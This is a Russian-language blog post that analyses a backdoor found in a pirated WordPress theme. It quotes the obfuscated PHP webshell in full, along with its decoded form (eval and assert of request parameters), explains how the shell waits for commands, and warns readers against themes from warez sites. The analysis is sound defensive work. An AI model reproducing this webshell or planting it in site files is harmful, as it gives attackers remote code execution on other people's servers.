Бэкдор (webshell) в теме WordPress

Результат проверки на virustotal.com

И снова ко мне в руки попалась тема зараженная вредоносными скриптами. Причем эта тема вполне себе нормально жила на сайте одного знакомого, пока там не обновили php до свежей версии, где вредоносный скрипт перестал работать, чем и выдал себя. К сожалению встроенный антивирус ClamAV не обнаружил этот скрипт. Остальные антивирусы определяют зараженные файлы как Trojan.Script.1006652 , Trojan.Script.DF5C3C , PHP.Shell.597 , PHP/WebShell.FX!tr

Этот бэкдор — просто кусок кода в начале некоторых php-файлов темы, который всеми способами пытается зашифровать название используемой им php функции «assert» для запуска произвольного кода. Удалить его не сложно — нужно просто отрезать вредоносный код, а вот обнаружить сложнее. Выглядит он так:

<?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);$_=$_fF("",$_cC);@$_();?><?php $a=substr_replace("axxxert","ss",1,3);$a($_POST['1']);?><?php $a = chr(92+5);$b = chr(ord($a)+18);$c = chr(ord($b)-14);$d = chr(ord($c)+13);$e = chr(ord($d)+2);$f = $a.$b.$b.$c.$d.$e;forward_static_call_array($f, array($_REQUEST['11']));?><?php

что декодируется в следующие строки:

eval($_POST['1']);
assert($_POST['1']);
forward_static_call_array(assert, array($_REQUEST['11']));

Суть этого кода сводится к тому, что он просто ждет GET или POST запрос с параметром «1» или «11» и выполняет код который там передан. То есть в отсутствии внешней команды код никак себя не проявляет, и ничего не делает, но при нахождении вашего сайта ботнетом, который регулярно рассылает тестовые команды, он легко может стать его частью.

Так что еще раз стоит напомнить любителям ставить темы из варезников или сборников тем на разных сайтах — это очень вероятный способ получить зараженный сайт сразу же с момента его создания.

Еще немного статей на эту же тему:

Запись опубликована в рубрике Без рубрики. Добавьте в закладки постоянную ссылку.

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *